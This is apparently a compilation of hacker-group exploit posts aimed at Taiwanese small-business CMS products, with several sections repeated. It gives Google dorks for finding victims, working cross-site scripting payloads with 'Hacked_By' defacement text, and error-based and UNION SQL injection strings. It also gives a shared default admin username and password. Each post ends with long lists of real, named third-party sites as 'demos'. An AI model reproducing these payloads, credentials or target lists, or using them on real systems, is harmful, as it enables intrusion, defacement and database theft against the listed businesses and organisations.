########################################################
# Exploit Title: 花蓮民宿王 │ 洄瀾網 Cross Site Scripting Vulnerability
########################################################
# Google Dork: intext:"花蓮民宿王 │ 洄瀾網" inurl:index.php?news_id=
# Date: [28/12/2015]
# Exploit Author: Gray Hat Group=>MR.BL4CK
# Vendor Homepage: [http://www.17357.com.tw/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target.
# Then test for this vulnerability You must Test scripts in After Id Number.
# for example These scripts:
# 1-[<script>alert('XSS')</script>
# 2-["><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>]
# 3-[<marquee%20behavior="alternate">Hacked_By_MR.BL4CK<b>]
# Poc:
# http://www.chenfa8533996.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# GooD LucK
########################################################
# Demo:
# http://www.chenfa8533996.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.gmu.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.hl-sunshine.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.shanjun.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.nice-neighbor.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.summer-love.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.brightly-home.com.tw/new/index.php?pageNum_RecdigiBoard=0&totalRows_RecdigiBoard=1&news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.blueocean-c.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.jimeihomestay.com/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.hl-garden.com.tw/news.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
########################################################
##############################################################
# Exploit Title : Design By 種籽網頁設計 SQL injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.e-seed.com.tw/
# Google Dork : site:.tw inurl:board.php? stx=
# Date: 26 Dec 2015
# Tested On : Win 10 / Google Chrome
#
######################
# adminpage= target/adm/
#
# demos :
# http://www.chain-dent.com.tw/bbs/board.php?bo_table=dental&page=1&sfl=1'&sod=desc&sop=and&sst=40(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(table_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+-
# http://sun-wang.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://hsu-design.com/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://pentathlon.org.tw/bbs/board.php?bo_table=links&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.shootingsport.org.tw/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.in-motel.com.tw/bbs/board.php?bo_table=room&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.flower888.com.tw/bbs/board.php?bo_table=special&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.tw-sd.com/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.su-attorneys.com.tw/bbs/board.php?bo_table=legal&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.wtd.com.tw/bbs/board.php?bo_table=building&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://home-light.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.cscsignal.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
#################################################################
########################################
# Exploit Title : Design By 種籽網頁設計 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.e-seed.com.tw/
# Google Dork : site:.tw inurl:board.php? stx=
# Date: 2015/12/28
######################
#
# Demo:
#
#http://www.sun-wang.com.tw/bbs/board.php?bo_table=news&page=2&sfl=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://www.spaceframeal.com.tw/bbs/board.php?bo_table=service&sst=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://www.shootingsport.org.tw/bbs/board.php?bo_table=fire&sst=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://yoli.com.tw/bbs/board.php?bo_table=qa&wr_id=7&sfl=&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://e-wewe.com.tw/bbs/board.php?bo_table=faq&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://www.sushionly.com.tw/bbs/board.php?bo_table=menu&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#http://lovinghut.com.tw/portal/tw/bbs/board.php?bo_table=menu_tw_en&sfl=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Teamwr_link1&stx=8&lang=_en&m=ct
#http://www.rtr-tech.com.tw/bbs/board.php?bo_table=news_en&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team
#
#######################################
######################
# Exploit Title : PGO CMS SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.pgo.tw/
# Google Dork : intext:"趴趴狗旅遊網設計" inurl:index.php?id2=
# Date: 30 Dec 2015
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# adminpage= target/admin/
#
# demos :
# http://www.happiness163.com/index.php?id=594330&id2=-2389%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.stuartvilla.com.tw/index.php?id=594591&id2=-2569%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.rainbowtown.com.tw/index.php?id=584&id2=-7587+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://www.bali-bali.com.tw/index.php?id=704&id2=-2536%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://demo.pgo.tw/index.php?id=147&id2=-9495+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16
# http://www.fishfun.tw/index.php?id=594313&id2=-7592+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://www.sara82-1.com/index.php?id=595126&id2=-1691%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.allparty.com.tw/index.php?id=594149&id2=-1708%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.wzhotel.tw/index.php?id=592503&id2=-2888+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://fangshuh.com.tw/index.php?id=593219&id2=-7585+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://111yotaiwan.com/index.php?id=595787&id2=-2145%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
# http://www.waterripple.tw/index.php?id=595061&id2=-7536+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://caifeng500.com.tw/index.php?id=594280&id2=-4837+union+select+1,2,3,4,5,version(),7,8,9,10,11,12
# http://www.hw32.com/index.php?id=2742&id2=-2453%27+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--%20-
######################
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: 網頁設計 詮通網頁設計 Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://www.s2-everywhere.com/
|[+]
|[+] Google Dork: intext:"網頁設計詮通網頁設計" news_detail.php?
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 2016 08 January
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork and choose a target and add "%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e" after URL!
|[+] To see Vulnerability!
|--------------------------------------------------------------|
|[+] Examples :
|[+]
|[+] https://www.nics.org.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] https://www.mt.org.tw/taipeicity/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.topetag.com/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.tsvs.org/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.asi-hk.com/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.muchang.com.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.yamato.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.yellow-gold.com.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.99cook.com.hk/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.hengjo.com.tw/news_detail.php?serial=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.chien-feng.com/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.hartfordbuy.com.tw/news_detail.php?newsid=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://member.asiamc.com.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.bbbook.com.tw/news_detail.php?id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28969506%29%3c%2fScRiPt%3e
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
######################
# Exploit Title : 彩虹軒設計整合行銷 SQL Injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.digart.com.tw/
# Google Dork : intext:"彩虹軒設計整合行銷" inurl:/seenews.php
# Date: 06.01.2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# adminpage= target/admin.php
#
# demos :
# http://mks-servo.com.tw/seenews.php?idNo=-70+union+select+1,2,version(),4,5,6
# http://www.how-mama.com.tw/seenews.php?idNo=-51+union+select+1,2,version(),4,5,6
# http://www.sea-chicken.com.tw/seenews.php?idNo=-77+union+select+1,2,version(),4,5,6
# http://www.amrita.com.tw/seenews.php?idNo=-123+union+select+1,2,version(),4,5,6
# http://ilan-asahi.com.tw/seenews.php?idNo=-89+union+select+1,2,version(),4,5,6
# http://mks-servo.com.tw/seenews.php?idNo=-81+union+select+1,2,version(),4,5,6
# http://arjay.com.tw/seenews.php?idNo=-562+union+select+1,2,version(),4,5,6
# http://www.arthurschool.com.tw/seenews.php?idNo=-35+union+select+1,2,version(),4,5,6
# http://reflex.com.tw/seenews.php?idNo=-95+union+select+1,2,version(),4,5,6
# http://www.liferainbow.com.tw/seenews.php?idNo=-85+/*!50000union*/+select+1,2,version(),4,5,6
# http://www.chau-feng.com.tw/seenews.php?idNo=-63+/*!50000union*/+select+1,2,version(),4,5,6
# http://www.shenyun66.com.tw/seenews.php?idNo=-78+/*!50000union*/+select+1,2,version(),4,5,6
# http://www.goldi.com.tw/seenews.php?idNo=-66+/*!50000union*/+select+1,2,version(),4,5,6
######################
# discovered by : modiret
######################
######################
# Exploit Title : 百邇來 網頁設計 Weak Password
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.buyersline.com.tw/
# Google Dork : intext:"網頁設計 百邇來"
# Date: 2016 01 10
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# Search Google Dork and Choose a Target and put this after URL : /jobs/index_login.php
# and put this username & password :
# username : steve
# password : blc2293
#
# Demos :
#
# http://www.thhpacking.com/jobs/index_login.php
# http://www.hsienchi.com.tw/jobs/index_login.php
# http://www.young-spring.com/jobs/index_login.php
# http://www.lively-travel-thailand.com/jobs/index_login.php
# http://www.ceramiccartridge.com.tw/jobs/index_login.php
# http://www.looben.com.tw/jobs/index_login.php
# http://www.jiujan.com.tw/jobs/index_login.php
# http://www.tohoku.com.tw/jobs/index_login.php
# http://www.yonghopumps.com/jobs/index_login.php
# http://www.macaca.com.tw/jobs/index_login.php
# http://www.jinn-jye.com.tw/jobs/index_login.php
# http://gmpbaby.com.tw/jobs/index_login.php
# http://www.unotex.com.tw/jobs/index_login.php
# http://www.yonghopumps.com/jobs/index_login.php
# http://www.mindfulness.org.tw/jobs/index_login.php
# http://www.ghkairsoft.com/jobs/index_login.php
# http://www.abgenomics.com/jobs/index_login.php
######################
# Exploit Title: 花蓮民宿王 │ 洄瀾網 Cross Site Scripting Vulnerability
########################################################
# Google Dork: intext:"花蓮民宿王 │ 洄瀾網" inurl:index.php?news_id=
# Date: [28/12/2015]
# Exploit Author: Gray Hat Group=>MR.BL4CK
# Vendor Homepage: [http://www.17357.com.tw/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target.
# Then test for this vulnerability You must Test scripts in After Id Number.
# for example These scripts:
# 1-[<script>alert('XSS')</script>
# 2-["><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>]
# 3-[<marquee%20behavior="alternate">Hacked_By_MR.BL4CK<b>]
# Poc:
# http://www.chenfa8533996.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# GooD LucK
########################################################
# Demo:
# http://www.chenfa8533996.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.gmu.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.hl-sunshine.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.shanjun.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.nice-neighbor.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.summer-love.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.brightly-home.com.tw/new/index.php?pageNum_RecdigiBoard=0&totalRows_RecdigiBoard=1&news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.blueocean-c.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.jimeihomestay.com/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.hl-garden.com.tw/news.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
########################################################
##############################################################
# Exploit Title : Design By 種籽網頁設計 SQL injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.e-seed.com.tw/
# Google Dork : site:.tw inurl:board.php? stx=
# Date: 26 Dec 2015
# Tested On : Win 10 / Google Chrome
#
######################
# adminpage= target/adm/
#
# demos :
# http://www.chain-dent.com.tw/bbs/board.php?bo_table=dental&page=1&sfl=1'&sod=desc&sop=and&sst=40(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(table_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+-
# http://sun-wang.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://hsu-design.com/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://pentathlon.org.tw/bbs/board.php?bo_table=links&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.shootingsport.org.tw/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.in-motel.com.tw/bbs/board.php?bo_table=room&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.flower888.com.tw/bbs/board.php?bo_table=special&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
